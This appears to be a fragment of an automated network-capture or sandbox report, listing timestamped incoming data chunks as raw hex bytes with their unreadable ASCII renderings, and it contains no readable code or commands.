                                                                                                                                                    2022-09-29 12:59:14 UTC24663INData Raw: 0d f9 84 d0 bb ad 83 11 e9 2e a0 36 e3 61 c7 4f df 69 46 f0 e2 7a 70 51 5b 7f be 86 f4 04 0e 93 20 82 24 f8 7c d6 12 ff 25 e0 21 24 ba e4 ec 23 f7 07 da 8f 0f 05 80 fa d2 b1 32 43 60 a7 5a 7f 28 45 06 37 61 1e 71 b4 f3 81 fa d3 41 3f 9f 5b 60 0f 3d 50 3f 9d 6e 70 3b 22 41 75 8e f8 1c 55 eb a4 28 2f 55 34 6f e0 98 51 39 57 93 13 01 fe 56 15 bc 09 9e 60 52 f8 76 ea 93 9a 93 2b 05 2d 53 e5 b2 e3 77 84 48 e5 33 07 e5 a5 00 e5 fc ca 03 69 fe f2 d4 51 85 c3 5c 99 91 c6 bd 5b 54 26 52 96 9c 86 83 a7 86 75 14 98 6d 94 7a 86 8a db e3 ab e1 8d 93 ac b5 ea b5 3f 04 b3 47 b9 a7 06 51 00 59 1c 18 3f 11 9d 35 ae ee ee ff c5 fc f0 60 1b c4 9c e1 41 e8 5e 41 00 28 60 16 fc 18 1a af 98 2e 73 08 8f 53 e9 b3 6a 33 84 ed 87 51 fc 90 f9 b7 33 d5 8c 4a 22 10 08 c1 fb d6 b9 0d
                                                                                                                                                    Data Ascii: .6aOiFzpQ[ $|%!$#2C`Z(E7aqA?[`=P?np;"AuU(/U4oQ9WV`Rv+-SwH3iQ\[T&Rumz?GQY?5`A^A(`.sSj3Q3J"
                                                                                                                                                    2022-09-29 12:59:14 UTC24679INData Raw: 45 ca e7 fd f8 4e 49 1b 52 17 36 c6 90 e2 fc f5 9e 48 ef dd 87 cb c6 44 e8 44 8f d6 f9 92 7d 21 68 0a 06 20 68 5c 87 3c c8 7f a1 1a ac 37 b8 00 3e 79 66 95 9e 3f 2f aa f8 c0 88 91 80 3e 37 66 9b fc 36 16 9d 2b 4a 19 7a cf 52 94 9f 10 e4 00 26 89 70 18 6b fb 8a 72 f5 bb ef a6 18 0a 07 7c 3e 71 a5 21 53 b8 f0 59 1a 72 02 8c 0f c8 cb a8 38 d2 bd 74 ce 24 e4 77 2e 13 9c 02 d0 4f 7a d8 8f be a9 48 b4 d1 17 f1 b6 24 f9 ed 44 15 5a 79 1b 40 b1 b0 9f 44 fd 77 fc fc d4 92 0c 84 a2 9c 15 4c 37 61 36 ac 1a 77 7b aa 4a e2 16 d4 8b 92 ab ef a8 d7 57 7b 47 1e 1e 15 69 e6 12 33 bf 58 df ba 6f c3 50 76 3a f0 35 1c 8d 58 6f e1 b5 e2 46 51 1e d3 99 7a a1 84 6b 47 45 16 6a e8 3e 0d d1 67 7d 0a 56 fe 01 9d 52 b9 dd c1 61 2a 53 47 c1 b8 a9 45 32 b2 af ff e6 8c 09 1a c2 be 38
                                                                                                                                                    Data Ascii: ENIR6HDD}!h h\<7>yf?/>7f6+JzR&pkr|>q!SYr8t$w.OzH$DZy@DwL7a6w{JW{Gi3XoPv:5XoFQzkGEj>g}VRa*SGE28
                                                                                                                                                    2022-09-29 12:59:14 UTC24695INData Raw: 78 24 6a 61 2a cd 18 70 2b cf b8 92 1e 3f 7d 00 54 6a 4a 30 3f 11 0c 92 31 5d bf c6 79 45 96 32 77 fc 29 0c ef 8d 7e d7 d1 9d 1e 7b 7e 36 87 9c ec ca 01 e4 07 8b 3d bc 03 cc 8b 26 b7 11 62 d9 39 98 ea 16 c5 0e 59 d9 f4 a4 1e 30 fc fc f7 29 af 33 9e 8f 74 77 85 92 2c 2c 00 4a 91 5a 04 4a 77 d3 b6 69 82 52 81 d2 6c 53 cb eb d7 5e 88 ab ee f3 84 9c 63 77 32 fb 90 05 31 0d b1 b6 31 26 6c 52 ae e2 e4 c9 f5 5e a8 4e a1 b6 c8 c7 bd fe b6 e3 15 1f 86 37 56 7c 9b 29 26 d8 46 a6 08 17 df 37 eb 3d a9 5f c9 fc 06 24 70 ab 50 b7 89 76 e5 86 ea 03 5a 98 13 03 a6 7e 64 85 a0 25 75 bb 00 d5 51 6f 47 82 16 dc 8e 1a 98 ec a2 8f 53 0a 46 4e b0 22 dc c6 b0 f2 5c a4 33 18 68 fe cb d1 40 ad ee eb 3a 24 f0 b3 bc ce 91 a6 8a 6f a1 db 28 08 cd aa f7 02 06 77 2a ce d6 2e db 3f 2a
                                                                                                                                                    Data Ascii: x$ja*p+?}TjJ0?1]yE2w)~{~6=&b9Y0)3tw,,JZJwiRlS^cw211&lR^N7V|)&F7=_$pPvZ~d%uQoGSFN"\3h@:$o(w*.?*
                                                                                                                                                    2022-09-29 12:59:14 UTC24711INData Raw: 38 47 9a 99 c6 d0 3f 55 f2 a8 83 91 43 36 0f de 17 9a fe 0e 0a 7f 28 26 71 ea 90 b3 db fa f6 4b 9f c5 29 5d 6e 3c f8 d0 e2 4f 58 10 26 91 21 73 e8 aa cb bf 9c 5e ff 39 1a 28 d7 9c 3e 30 c2 6c 61 4f 5b 31 c3 05 b1 96 4b 28 0b 33 e6 3c 15 a7 bb 84 a6 18 3b d3 e6 c2 90 a3 83 50 83 b6 06 04 bd 02 30 46 7f 17 d4 31 35 7b c8 c8 70 48 1a dd 2a 3f 4a c5 07 df f6 09 6d fe 11 3b 1e 25 4a f3 58 2a 1a d5 4f 1e 45 b3 50 80 57 b4 20 44 9b 0b 5b 43 d2 21 a3 7e 61 5c ba eb 64 e1 74 bd 04 56 e5 ba 55 ca 9f b7 1e 91 1c 0f 26 97 f6 c9 05 48 89 ec 4e 41 ea 57 2d b1 dc 80 de 2b ee 95 37 4a b2 08 93 2f 12 eb 85 df 0f 0c a8 ea 1c 82 38 16 2d b4 20 ab c8 94 6f d0 50 a6 a4 b9 31 06 45 cd 31 d7 e2 53 59 b8 65 64 79 4d 49 5f 70 3c ca 2f b6 97 b2 dd 1a 1c 4d f7 86 f4 47 f1 78 26 4d
                                                                                                                                                    Data Ascii: 8G?UC6(&qK)]n<OX&!s^9(>0laO[1K(3<;P0F15{pH*?Jm;%JX*OEPW D[C!~a\dtVU&HNAW-+7J/8- oP1E1SYedyMI_p</MGx&M
                                                                                                                                                    2022-09-29 12:59:14 UTC24727INData Raw: 98 2c bd 8d 69 a7 65 23 29 85 85 43 0c 7f f6 2f c0 9a 71 aa 63 e3 49 c8 b6 75 f8 3f 23 d9 49 62 7f ff 7f 7e 64 26 f4 6d bb dc 4d 0f 9c 40 17 1d 2f ed 39 bc ff f1 12 d3 b8 66 5c 3e 9f 7e d1 e8 bd fb 7b 53 c5 dc 9a c5 89 7a 3f d6 e2 43 9c d2 78 a3 70 cd 17 94 00 40 d7 36 b0 55 33 24 f0 93 85 f7 3d 81 d1 b9 56 f8 3e 2b 92 9e bb c4 f8 8b e0 1c ed d6 62 09 30 bd a2 7e 2a dd f7 66 f8 d1 29 4c 21 66 9b 51 8e ad 65 6d ef bd cf fb a0 79 d3 47 30 49 82 8b e3 43 d1 7a e7 65 b7 fb af 88 47 66 5a 92 c6 96 e9 4b e4 1c cc 79 fe 10 f8 89 a9 8b d8 8f 53 3a e2 5e b1 ec a4 7f e4 58 7c b1 f6 b3 5e 02 b7 71 64 9b 42 0a a6 a1 61 14 48 8d 9e 05 2e 28 79 28 b4 33 d9 17 8e ac 89 69 1e 60 97 f0 7c 8c 84 e8 43 60 96 c2 68 06 a3 c3 c3 ea 32 2d 6e 7b ee f5 10 5a af 42 90 a6 37 e4 a5
                                                                                                                                                    Data Ascii: ,ie#)C/qcIu?#Ib~d&mM@/9f\>~{Sz?Cxp@6U3$=V>+b0~*f)L!fQemyG0ICzeGfZKyS:^X|^qdBaH.(y(3i`|C`h2-n{ZB7
                                                                                                                                                    2022-09-29 12:59:14 UTC24743INData Raw: e9 f7 e9 a1 8a 28 05 8d bd 69 ec 82 65 51 fa bc 0b 82 95 dd a0 2b 73 be 22 b3 7d fb c6 26 01 05 af b0 8f 85 49 72 d9 49 bb b5 46 a8 1d 20 29 fc 2d d3 bc 7a a9 4e 72 0d 26 ce 1b 95 66 23 65 b5 d7 7f 99 44 9f d9 c2 67 77 75 47 a9 d8 f3 b6 9d 58 e5 34 76 c0 f5 89 63 69 76 bd 33 7c ca 22 95 74 67 72 79 5c 5b ae 19 a4 72 6d a1 b3 e1 90 af 1b 77 30 34 0f be 6e 65 03 d6 34 0f fe 6c 14 61 86 7a 10 6f 14 af 83 c3 c9 d1 78 80 6a d0 50 f0 0c d0 16 93 df 2b e8 e9 4a 76 fc b4 2a 51 3f ad dd 95 74 21 2b 2c b6 8d 03 9a 6f ac ba 67 d8 d9 b2 ca d8 6b 41 08 62 d6 cc 92 72 a3 04 a9 1e 96 5b 72 e1 00 3a f4 d7 b4 fa c8 8c 92 ae 36 9c 34 e7 5f b7 7e 91 c5 a4 39 a7 5d e2 76 8c 07 69 d8 7a 4d 24 2b 8e 09 dc 01 3d 42 1c 46 5b 12 df 2a 67 b0 18 b6 0f b0 d6 f3 1a 6e 1b fc 24 ce 7d
                                                                                                                                                    Data Ascii: (ieQ+s"}&IrIF )-zNr&f#eDgwuGX4vciv3|"tgry\[rmw04ne4lazoxjP+Jv*Q?t!+,ogkAbr[r:64_~9]vizM$+=BF[*gn$}
                                                                                                                                                    2022-09-29 12:59:14 UTC24759INData Raw: f1 3b ae a9 3a fc aa 05 46 25 2f 79 16 ee 69 8d 94 3e 79 1a 2a 82 12 6d 66 c2 1f c6 e8 71 b6 20 e2 21 29 55 26 cd d7 75 72 9b 3a 18 c5 74 03 36 a6 28 b6 89 35 ef 08 dd 44 92 5b ed 80 3e ed ce 62 a6 1a 1c 41 28 d9 99 8c b8 1a 4a 48 60 5a b3 69 5c 35 b6 6a fe 60 57 ed c7 e8 5a d5 28 41 8f eb e8 0f 76 91 05 3f b4 53 a2 63 b0 d5 d4 e0 0c 48 d2 35 ac 9b c8 88 98 aa 6e c9 14 e2 8c f1 96 78 d1 1c 3d 6c b0 bc 44 94 95 ea 69 98 b1 a1 51 f2 9c 03 ad 57 9d 33 89 1b 8a 51 c7 be f4 57 95 63 df 19 19 78 2c 81 4a 7d 8b c6 29 d1 3d 74 6b fe 12 d2 f1 91 e9 b4 fb dd 51 d7 ed d7 4d 76 2a de 44 b7 a2 b9 ca c7 90 59 88 7e a2 37 e2 ca e4 e3 37 02 03 ac bb c3 b7 4f 3b 4c eb a8 f6 df d1 27 9f 55 fa 09 21 ea 7c b5 51 23 98 18 e6 00 38 52 bb 22 76 ac 73 02 13 32 32 1a 93 9b 92 06
                                                                                                                                                    Data Ascii: ;:F%/yi>y*mfq !)U&ur:t6(5D[>bA(JH`Zi\5j`WZ(Av?ScH5nx=lDiQW3QWcx,J})=tkQMv*DY~77O;L'U!|Q#8R"vs22
                                                                                                                                                    2022-09-29 12:59:14 UTC24775INData Raw: a8 93 15 3e 8c 9c ac 31 1b 41 10 85 91 ff 7d 72 c6 03 41 23 96 9f 54 03 3e 3e 11 fc dc 06 58 c7 24 3d a7 a8 40 9a d0 d2 79 3b 86 cc 3a 40 f3 5b 51 f2 41 c6 5d 73 46 4b 64 cd 35 fc 55 e1 29 2c 9b 90 9b a5 de dd 8c 52 16 44 3e 91 c0 7f 6c af aa 07 f6 9e 5b e3 8a 4b 39 28 25 71 4a 65 a6 cb 4e 4b 49 67 ac df fc 6e 9b 49 5a 0f 8b 55 6b f5 9c 62 67 7e 3e 23 d6 98 14 14 41 85 70 b3 ca 30 03 9b d4 7d 50 bb 6b 75 1e 6d d6 19 7f ee 8c ef 8f d4 0c d1 9e db ef 3d 9e 94 d1 3c 7b 96 74 8f 4e 22 8c 0a d6 5f 90 4d 2a 4e 4e be ac 96 8a 7c 25 54 c2 87 19 af e1 bb d5 3e 96 4c 0a 59 d5 2c 81 1b 4a f1 01 a0 55 57 57 9b bd 88 a4 d5 ba 35 9f 16 cb e6 b2 92 e5 d0 2b d2 bc 19 4f c3 f7 dc f2 14 97 4c ac 33 cb 0f 3f d0 9e dd ba f5 9e d3 c1 7c 6a 1a c3 8e 6a e0 e9 58 29 6c 98 e9 5a
                                                                                                                                                    Data Ascii: >1A}rA#T>>X$=@y;:@[QA]sFKd5U),RD>l[K9(%qJeNKIgnIZUkbg~>#Ap0}Pkum=<{tN"_M*NN|%T>LY,JUWW5+OL3?|jjX)lZ
                                                                                                                                                    2022-09-29 12:59:14 UTC24791INData Raw: 35 dc c1 c8 bb 8b ef 5e c3 92 20 c8 40 6c 98 12 86 98 0b 4e c8 44 83 88 2d 3e 25 17 ab 94 a6 7d ab d1 e1 dd 10 77 13 06 e9 e4 93 bc 91 fe 40 82 d0 9c 1e 18 6e d7 e8 02 fd 05 c1 a1 7a 8d dc 18 53 a7 95 95 08 89 ca dc 36 39 d6 39 30 5a 08 26 eb cc 90 dc df 92 6d 99 cb 32 d6 df 88 f1 26 95 8b 73 a3 0a 24 27 2f e2 45 ae eb 06 50 a1 13 87 a5 83 c8 d6 50 2e 34 22 94 5f 04 6b 80 1e d5 ab 8f 17 1b e3 e6 73 90 d2 1f 82 75 56 c5 dc f5 01 05 c2 25 c1 5d 0a 1f f2 62 3d 17 2c 71 2b 61 bc f9 eb 98 e9 d9 23 4a 6d 14 97 41 13 81 f2 82 1e 5e f1 f4 be 25 5a f4 f5 7c e9 62 a1 43 2b 6b c3 85 b9 da 26 bc 64 36 60 34 27 1d 5b 6d 24 38 0b 15 9d c0 1a 01 05 a8 e8 4a 4a 55 18 d1 b1 00 d3 1d bd 17 ee 98 93 03 75 ef 75 87 99 bc 17 c3 66 62 8c 07 99 42 e8 d9 40 e3 cc 3d 32 59 2a 8f
                                                                                                                                                    Data Ascii: 5^ @lND->%}w@nzS6990Z&m2&s$'/EPP.4"_ksuV%]b=,q+a#JmA^%Z|bC+k&d6`4'[m$8JJUuufbB@=2Y*
                                                                                                                                                    2022-09-29 12:59:14 UTC24807INData Raw: f3 8d 94 48 68 21 56 6c 3e 88 73 d0 a3 38 c8 50 ac e8 6d 1e 47 50 dc 0e 25 80 1f ac af 91 47 b9 0e 23 e7 b8 bd 1f 27 65 ed 96 95 a4 5d 95 87 ca 33 63 fb ec 32 da ef 4e 99 d4 a8 17 2c ea 11 67 77 64 f3 fc 96 4d 28 b8 4e e3 76 7b 35 31 03 78 55 45 ce 18 e2 b6 f8 34 e0 77 ba 83 50 cd a6 45 89 9b 54 05 e8 98 22 7e 03 b3 1e 83 58 83 75 26 07 d5 f5 bf 5e 99 db d4 3e a2 4e c1 db d9 78 f0 bb 94 41 32 b7 5c 31 b2 77 a0 b6 f9 9d 9b f0 5b ea 27 b6 d7 8f b6 f0 3d 78 06 bf ab 1e 28 75 17 8c 09 69 ea 79 ac 02 4a 7a 5c 71 fe a5 f2 33 2e b6 38 fe 15 df df 78 e1 8c ff a8 c1 39 05 2e e5 60 2e dd 99 77 58 73 9e b7 3c 9d 22 46 e2 c7 06 0b 59 d7 c3 16 38 1a 79 64 d7 61 93 17 2c 24 d2 b6 0a 4e 4b 86 f0 d1 77 c4 25 04 ad 6c 4a 23 a4 4a b9 53 21 1b 92 80 17 d4 8a 23 96 69 4e 9b
                                                                                                                                                    Data Ascii: Hh!Vl>s8PmGP%G#'e]3c2N,gwdM(Nv{51xUE4wPET"~Xu&^>NxA2\1w['=x(uiyJz\q3.8x9.`.wXs<"FY8yda,$NKw%lJ#JS!#iN
                                                                                                                                                    2022-09-29 12:59:14 UTC24823INData Raw: 00 b9 d8 01 1e 05 03 66 ee b8 11 92 29 20 f4 3f 41 96 b1 46 5d cf 0e 1c ce 03 d0 d5 8f b1 9e 94 d0 1f 2b 73 05 0a 8c 5e 17 c2 8d 7f b2 08 e5 9d 31 80 f1 5f b1 50 35 76 0c e7 55 4c 3d 52 2c 76 a6 ff fe 15 bb 51 f9 f2 ec da 67 ed e9 18 03 d8 f8 e0 63 4f 7b 64 57 0b 38 77 9e 1a 01 4a 30 eb bb f5 73 10 5b 88 a0 29 9c be bd 44 9b 3e 1b e3 cf 9d 9d 91 0d 87 cb d2 a8 ec 1f 89 ff 7f ef a3 99 96 f7 f8 3c 59 be cc 4f 85 2d d3 06 82 7c 7e 5e db 3d 40 63 20 eb 70 55 c0 96 7e 4f 6d b3 3e a2 27 17 84 d5 44 31 25 dc db 1b b5 11 24 88 d8 00 46 ff b8 43 39 ce f1 8b ba ab 4f 10 c4 54 31 b8 46 66 ab de fa de 97 c8 a5 fd b8 ce 22 85 e8 0b b1 57 3f 21 85 f3 ba e8 cc 88 54 9c c1 70 3d 89 c2 d5 b0 ea 2d 19 74 26 b6 09 4e 9d c3 a9 3c f0 33 d7 44 5a cd 91 19 58 2b 6f b0 ac 74 af
                                                                                                                                                    Data Ascii: f) ?AF]+s^1_P5vUL=R,vQgcO{dW8wJ0s[)D><YO-|~^=@c pU~Om>'D1%$FC9OT1Ff"W?!Tp=-t&N<3DZX+ot
                                                                                                                                                    2022-09-29 12:59:14 UTC24839INData Raw: 0f d0 95 e6 05 74 97 18 50 68 6d 18 d1 a6 9a 08 e6 02 93 0a ae 9e da 42 bd f9 6d 2d 38 6e 57 56 bf 48 73 40 d0 8b f4 aa 99 80 04 19 35 e6 54 28 8b 8d 02 81 66 91 6b ff b0 7b f3 13 aa ab 33 51 17 19 8b 07 9c 54 81 97 9e 5a 4d 43 f9 3f 31 9c 34 6e 0c 48 7e 13 9e ab ab ab 67 d2 8a 9e 52 64 5b 17 9b 53 4a a9 78 a9 12 80 e5 1e ca ae 5a 25 98 35 00 0d b2 93 e7 e1 41 f5 8e aa ad 20 27 73 b9 72 d3 94 c2 3e f3 d3 73 63 0b 56 fd 07 9b c2 76 4e 7f 40 aa c3 e7 b4 c5 fe 77 b4 96 20 43 22 64 ae de ee 9b ab e7 57 d2 4f 7e 5c 01 c1 86 25 d2 3e 00 af 24 63 de bd 95 f3 da be 43 21 48 c2 12 b1 fe b4 27 2d 00 18 25 8f 57 2a 3c a7 a7 c4 a9 68 82 e1 99 47 7d 3d c5 e1 bd 2f 94 1a ed ea 86 07 0f d7 0d 0a c2 6f 7f eb ee 77 32 c8 1c 8f f6 05 1d 68 c6 93 a6 58 73 5d 1a 3b 49 9a 57
                                                                                                                                                    Data Ascii: tPhmBm-8nWVHs@5T(fk{3QTZMC?14nH~gRd[SJxZ%5A 'sr>scVvN@w C"dWO~\%>$cC!H'-%W*<hG}=/ow2hXs];IW
                                                                                                                                                    2022-09-29 12:59:14 UTC24855INData Raw: e9 d6 f9 60 6c 5a 24 41 cd 9e 09 3a f9 36 0d 0c 1e d6 c6 1f 04 f6 da 0a 65 77 38 0f e2 4c 9b 90 f4 e5 3e 67 9a 3d d1 bc 44 32 28 df a5 9d 3c 82 f0 78 b0 e8 22 3a 92 e2 22 6a 26 2f 64 ea f9 29 5e b2 06 74 0a 32 77 2d 06 be 04 c1 cf 8e 20 d4 fc 75 62 24 07 e4 85 05 c0 c6 1e c2 7d 13 6b bb 54 b3 dd 99 d7 07 37 02 9f d7 3c cb ef 40 58 86 ad 88 3d 14 24 6a 6a ed 7d 6d 65 a3 e3 69 8f 5f fd 18 29 23 c5 2d 40 47 b2 92 c9 79 fb 9c e4 73 43 9b ac ed 1a 53 42 62 d5 36 23 41 6c 60 f9 42 f7 ed 06 18 a5 28 b8 c2 8f d5 44 17 cb a1 06 c1 9e 98 fc 85 65 4b bc 53 df 3a 03 62 5f 6c af 21 2f bb 70 62 28 54 1f fd 1e d2 79 1d 25 43 ce 51 9e cb 3f 8a 80 32 bd b8 3a ff 6b 0e 92 71 16 54 68 85 26 50 4e b1 02 c9 e7 8c 6f 56 a8 93 73 d0 e3 bb 4d ac 61 d9 18 df 4b 68 ee e5 74 a6 2e
                                                                                                                                                    Data Ascii: `lZ$A:6ew8L>g=D2(<x":"j&/d)^t2w- ub$}kT7<@X=$jj}mei_)#-@GysCSBb6#Al`B(DeKS:b_l!/pb(Ty%CQ?2:kqTh&PNoVsMaKht.
                                                                                                                                                    2022-09-29 12:59:14 UTC24871INData Raw: 9f dd cd bd 77 57 d5 33 f2 fc e7 6f 1b 9e 90 c4 82 db 8d fb bd d8 01 a0 2d 56 24 9c b7 8d eb fe 83 56 c2 15 cd e5 49 01 6d 94 65 e8 cb 4b 5c 70 d4 fa 44 79 80 6b c4 d3 41 64 be 25 94 88 a6 0c 51 c5 1e 19 a6 9e 31 f0 79 bb 02 8f 23 77 a9 37 53 0a 5e 0f b3 7b df 41 b0 69 27 d5 c0 3c f6 70 5a 88 3c 2c 4d 00 5a 9d 5e b4 b0 ca 8e 3c 6c 8a 28 9c 6d 22 b6 6e 7d 0e 91 e3 13 6e 2c 00 78 ca 51 43 da 16 90 8b 60 06 03 d8 d7 2d 80 d7 d7 0a c7 14 1d 8a d7 e7 9b d7 79 9b 3e 8d 7d 71 63 64 71 15 85 c7 ec 9d 90 6b ae 4e f3 27 59 4b e3 52 c3 b3 44 b9 43 08 a5 4d 23 a8 50 a2 25 ef b9 e9 8a ab b1 9b e5 41 6b 1b 0a 3f 5b 4f 96 84 82 c0 94 cd 0a ca 2b 8b 8a 21 04 81 39 37 3b 7f 42 1a 99 38 d0 17 69 db 00 d8 a6 06 63 8f c2 e4 4b 76 4d 00 b2 41 37 8c 91 f2 3a 91 dc 01 cf 3e b8
                                                                                                                                                    Data Ascii: wW3o-V$VImeK\pDykAd%Q1y#w7S^{Ai'<pZ<,MZ^<l(m"n}n,xQC`-y>}qcdqkN'YKRDCM#P%Ak?[O+!97;B8icKvMA7:>
                                                                                                                                                    2022-09-29 12:59:14 UTC24887INData Raw: ee 61 9f 95 27 46 d6 ef 8a 6c f4 87 7a 3d 93 ab 0b 54 1b d6 ee b6 f0 47 06 fb 35 5f 6c a8 5a 68 cd 3a a5 56 bd 88 17 4a 16 8e 61 9a 93 12 1b 2a e0 bf c1 b8 cd 76 cd 5b 1a b6 12 2e 50 68 bd c5 90 ef 29 18 dc 0f 16 8e 3e 52 90 5b 78 44 b0 f3 bc a3 ba 2f 74 0f 03 47 d0 41 ce 75 f8 59 3c a7 99 f2 0b b9 d9 61 eb 08 2b 90 7f 5a 2c 22 31 9f 60 7c 89 96 43 d8 05 ec c9 34 a0 2d 05 e1 80 d7 a5 26 b2 8d 72 30 9a 25 1f d2 9b 48 22 4d c3 a2 b3 b5 68 fe 5c f1 7d 77 34 30 de 74 d5 32 77 52 2c d7 a9 a2 b5 c5 64 15 f3 6a f6 72 b0 ca fc 85 24 94 01 ee 21 93 3a d2 02 b2 a5 cb bd 8f 23 ce 3e e2 f1 ea d8 97 7d c7 1f 8e 4b d7 67 09 65 e5 50 5d fe dc b3 da a7 3d e2 58 eb c3 9b f5 77 e2 68 64 c8 63 1e 72 23 d5 4d 7d f2 6c 6d 2d 51 bc 71 c9 89 de cc ae 0d 08 ca 33 29 d5 d2 04 51
                                                                                                                                                    Data Ascii: a'Flz=TG5_lZh:VJa*v[.Ph)>R[xD/tGAuY<a+Z,"1`|C4-&r0%H"Mh\}w40t2wR,djr$!:#>}KgeP]=Xwhdcr#M}lm-Qq3)Q
                                                                                                                                                    2022-09-29 12:59:14 UTC24903INData Raw: 36 f5 01 e7 9d 42 71 e6 b9 df c4 04 14 40 9f f4 ec 13 9e 2e 33 0a a9 91 5e 37 ef 52 8b 0e cc 27 6c 68 59 2b 98 05 2e cb 0f eb bf 81 ae 59 b6 be e9 51 35 f0 9d 3e b6 16 3f ea 65 ee 70 85 96 89 9c 0e e2 63 66 d0 01 d6 99 8d ca 4c 89 e7 c5 8d cc 27 e3 91 b9 e9 88 d7 13 f2 28 55 ed 20 e2 8a f7 ef 6e b2 89 7d e2 1f c0 6d ca 92 ff e9 e8 bc de 17 e3 6c 23 8e 76 43 38 1d 31 8d 68 d6 df c5 bc 97 ff ce 02 b1 95 4f 17 77 bd 88 78 e7 7f 1d 9b 28 f5 05 b8 ad 96 bd 7e de aa d6 29 02 95 43 81 19 60 6e d5 56 f1 59 72 d5 fa 3b 27 de 11 fa 66 d0 53 31 52 eb 08 0e 43 dc ac 1b d6 e1 b8 9b 2b b7 28 87 16 ed cc e8 f7 f4 30 f4 a2 f8 6e 6f a3 3f 7a 4b a8 ba 19 e2 0c e6 68 ce 31 4b 24 f9 b9 34 d8 67 5e bc 0c 55 a8 5d b2 a0 50 d3 77 3d 71 6b d0 01 52 0e c8 fc dd e3 aa 0b 13 c5 76
                                                                                                                                                    Data Ascii: 6Bq@.3^7R'lhY+.YQ5>?epcfL'(U n}ml#vC81hOwx(~)C`nVYr;'fS1RC+(0no?zKh1K$4g^U]Pw=qkRv
                                                                                                                                                    2022-09-29 12:59:14 UTC24919INData Raw: 80 18 d2 02 6f a3 29 19 6b 44 c6 d9 c4 28 5d c1 87 3f 9d 20 79 0f d8 a1 7b 5a e4 c6 4b 79 27 4d c6 a0 22 c7 57 eb e2 22 3f e5 49 2a 95 25 2a 9e 7b 74 c9 50 14 3a 35 ff 30 5c 02 32 58 93 78 cc a7 8d 7e 11 47 72 23 d3 2f c9 90 9b b6 1d a9 6d 61 21 8a 2d e6 1c 02 13 49 cb 13 2f b1 cd 94 32 a2 33 49 cc 28 80 f0 59 9b 13 7a e1 61 91 c4 7c af 01 88 d7 e7 07 1a ac bf 0a 0e 67 f5 e4 2d 66 06 78 d5 b5 43 ac b0 c2 14 fe 5f 04 2c 8b 2d fe 5b f5 e5 d7 67 7a 54 ee 6b 26 e0 04 f9 fc 54 4e 5a 70 19 05 ac c1 02 94 9d d2 b2 b5 d6 f7 d8 9e 70 44 7f ea 33 b8 e7 7f 5b 9b a0 c7 5e 2f c7 cf e0 51 9c fe 43 39 c2 75 83 0e 3c db 84 65 3e cd 2c 78 3b fe 75 28 10 2b e9 24 30 bf b8 c1 b3 2e e8 d5 24 cf c1 2b fe ef 8b d0 c2 97 69 cb 9e ab 33 e2 a7 8b 15 af d6 37 11 f9 8c c2 e2 6c e1
                                                                                                                                                    Data Ascii: o)kD(]? y{ZKy'M"W"?I*%*{tP:50\2Xx~Gr#/ma!-I/23I(Yza|g-fxC_,-[gzTk&TNZppD3[^/QC9u<e>,x;u(+$0.$+i37l
                                                                                                                                                    2022-09-29 12:59:14 UTC24935INData Raw: 01 98 bf bd 38 66 e6 6e 2a d3 f1 23 62 54 05 0b ac 21 de 6e b3 db f8 97 06 0b 78 b2 8d b0 c4 22 ee d0 99 5e af e6 91 b7 64 0b 45 35 ac d1 d3 7d c0 b3 16 48 5a ca d2 87 33 4f a1 28 54 e0 10 bd 16 40 98 c4 5a 33 12 8d ea 9b d1 c8 31 bd af 6c e5 87 7e 53 77 99 55 58 87 ab f6 43 d1 d0 68 52 57 05 07 ec e7 f0 a8 0a 42 87 ab 38 bb 54 e6 a6 dd 5f 0c 22 9c b1 51 04 17 37 0b 5a a0 93 5a 63 69 10 ff 78 88 2b 89 50 65 fc e0 90 03 bb fe 99 fe 92 0c 17 1f 6d dd 10 e8 48 39 58 ac 75 ca b4 f5 61 82 12 55 15 f2 59 f1 da cb e0 f4 e7 58 a3 a2 52 93 89 fa 7a f4 fb df ba 9f d8 cb db b1 88 aa bb 3c 54 04 43 9a 8b 73 a0 44 b1 ae 14 98 77 33 31 0f d9 5b 58 60 36 79 40 35 73 4d 7f f5 21 18 7c 87 0c 9c ce b3 cc c7 14 84 78 e3 28 4b ab 54 85 78 07 87 99 95 a9 78 07 25 f6 4e ad a3
                                                                                                                                                    Data Ascii: 8fn*#bT!nx"^dE5}HZ3O(T@Z31l~SwUXChRWB8T_"Q7ZZcix+PemH9XuaUYXRz<TCsDw31[X`6y@5sM!|x(KTxx%N
                                                                                                                                                    2022-09-29 12:59:14 UTC24951INData Raw: 9c c0 2d dc 42 8c 1e 3f 92 7c 20 5f 52 a7 2e 8d d5 a8 ec bb e4 34 cf b4 2d a5 d9 07 2f fa a7 cc 44 86 b7 69 fb 92 a6 bb 4b c6 16 86 ae 12 69 27 69 2e 11 03 28 53 37 16 bf b6 66 ad b8 3a 4a 92 24 33 5f 09 1f 9f 84 c8 56 17 9e 76 7b 4e 3d cc 84 5d 3e 68 90 5c be c6 84 f5 e6 e7 b4 95 b5 e2 f8 c8 ab 5c 63 31 65 48 d8 4d 50 3a 5a 49 72 00 d4 b2 c0 34 a8 d1 f5 97 9d 43 4e 91 f5 60 69 48 39 d4 3d ea 55 fa 49 76 f0 b8 64 4d 6a 07 c9 35 ba 6b 4b 08 69 fe bc 1a 9e 93 dd e8 f6 aa 4f ef 29 c0 b0 61 31 7f e4 95 10 f4 b2 27 1e 8f 6b e2 43 0d 8d 5b 44 e3 00 01 14 e2 4c a0 b3 b5 0d e9 9f 5c 27 98 12 cf 91 15 3a d8 ae 98 d5 38 82 c2 46 7c bc 5f be 1c 18 b7 bd a3 bb 22 04 68 ac 1a 40 de e3 b1 5a 6c 2f 41 50 cd 74 c2 88 16 c3 cd 82 5b 29 c2 b5 c4 3e 57 f1 6b 28 cc 0d 71 1d
                                                                                                                                                    Data Ascii: -B?| _R.4-/DiKi'i.(S7f:J$3_Vv{N=]>h\\c1eHMP:ZIr4CN`iH9=UIvdMj5kKiO)a1'kC[DL\':8F|_"h@Zl/APt[)>Wk(q
